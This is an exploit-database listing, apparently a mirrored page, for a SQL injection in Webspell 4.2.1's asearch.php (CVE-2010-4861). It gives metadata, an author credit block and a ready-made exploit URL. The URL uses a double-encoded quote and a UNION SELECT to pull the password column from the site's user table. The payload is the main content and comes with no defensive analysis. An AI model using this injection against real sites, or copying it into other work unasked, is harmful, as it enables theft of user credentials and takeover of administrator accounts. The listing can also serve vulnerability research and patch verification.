[] NeoSense
E X P L O I T S
title author type platform port cve id

Webspell 4.2.1 - 'asearch.php' SQL Injection

Author: silent vapor
type: webapps
platform: php
port: 
date_added: 2010-09-29 
date_updated: 2010-10-31 
verified: 1 
codes: OSVDB-68279;CVE-2010-4861 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwebSPELL4.2.1b.rar
################# INFORMATION ##################################################
+Name : webspell 4.2.1 asearch.php SQL Injection Vulnerability
+Author : silent vapor
+Date   : 29.09.2010
+Script  : webspell 4.2.1
+Price : free
+Language :PHP
+Discovered by silent vapor
+Underground Agents
+Greetz to Team-Internet, 4004-Security-Project, Easy Laster
################################################################################

+Vulnerability : http://localhost/webspell/asearch.php?site=search&table=user&
column=nickname&exact=true&identifier=userID&searchtemp=search_user&search=

+Exploitable   : http://localhost/webspell/asearch.php?site=search&table=user&
column=nickname&exact=true&identifier=userID&searchtemp=search_user&search=
admin%2527%20UNION+/**/+SELECT%201,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM
%20ws_2lu_user%20WHERE%20%25271%2527=%25271

################################################################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.